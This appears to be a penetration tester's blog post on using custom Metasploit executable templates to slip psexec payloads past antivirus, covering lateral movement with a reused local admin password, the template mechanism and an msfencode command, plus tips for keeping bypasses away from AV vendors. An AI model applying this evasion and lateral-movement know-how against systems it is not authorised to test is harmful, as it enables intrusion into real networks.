When I do a penetration test I typically find some little hole someone forgot to patch, which I then use to get the local admin password. Most companies use the same local admin password on every machine, so my next step is to use the psexec module in Metasploit along with the admin credentials to get meterpreter sessions on as many machines as possible. The trouble is the exe that is copied to the victim machine by the psexec module is typically caught by the AV on the machine. Fortunately, Metasploit has built in tools to help you with AV evasion.
Metasploit creates executable files by encoding a payload and then inserting the payload into a template executable file. The templates are in the data/templates folder. Metasploit includes templates for Windows, Mac, and Linux, templates for x86, x86_64, and ARM, and a template for Windows services. If you look in the data/templates/src folder you will find the source files for each of the templates.
Modifying the Templates
Each source file declares a variable to hold the payload and assigns it the value of “PAYLOAD:”. The payload variable is 4096 bytes in some cases and 8192 bytes in others. Metasploit uses lib/msf/util/exe.rb to insert your payload by replacing the value “PAYLOAD:” with your encoded payload. You can use a custom template as long as it defines a variable of the right size and assigns it the value of “PAYLOAD:”. For the service template you can also define a variable and assign it the value “SERVICENAME”. Looking at the service.c template you can see the variable definitions:
#define PAYLOAD_SIZE 8192 char cServiceName = "SERVICENAME"; char bPayload[PAYLOAD_SIZE] = "PAYLOAD:";
Using a Custom Template
If executables built with the default template are getting caught by your AV then you will need to modify the source file, compile it, and then use the new executable as your template. If you are using msfencode it looks like this:
msfencode -t exe -x /path/to/template/template.exe
If you are using the psexec module then you can set the advanced options EXE::Template and EXE::Path.
There is no tried and true technique for bypassing antivirus. You may find your AV product can be bypassed with simple modifications to the templates or you may find that it doesn’t matter how you modify the template because the AV is picking up on the payload. This is when your encoding becomes important.
Here are a couple of things to keep in mind.
- People don’t like to talk about how they bypass AV because the AV companies will develop a signature.
- Don’t submit your AV bypass to VirusTotal or similar services because the AV companies use these services to develop new signatures.
- Setup a virtual machine with the AV you want to bypass, update it to the latest signatures then disconnect it from the network.
UPDATE: I have rewritten this article and put it on the Metasploit documentation wiki you can find it here.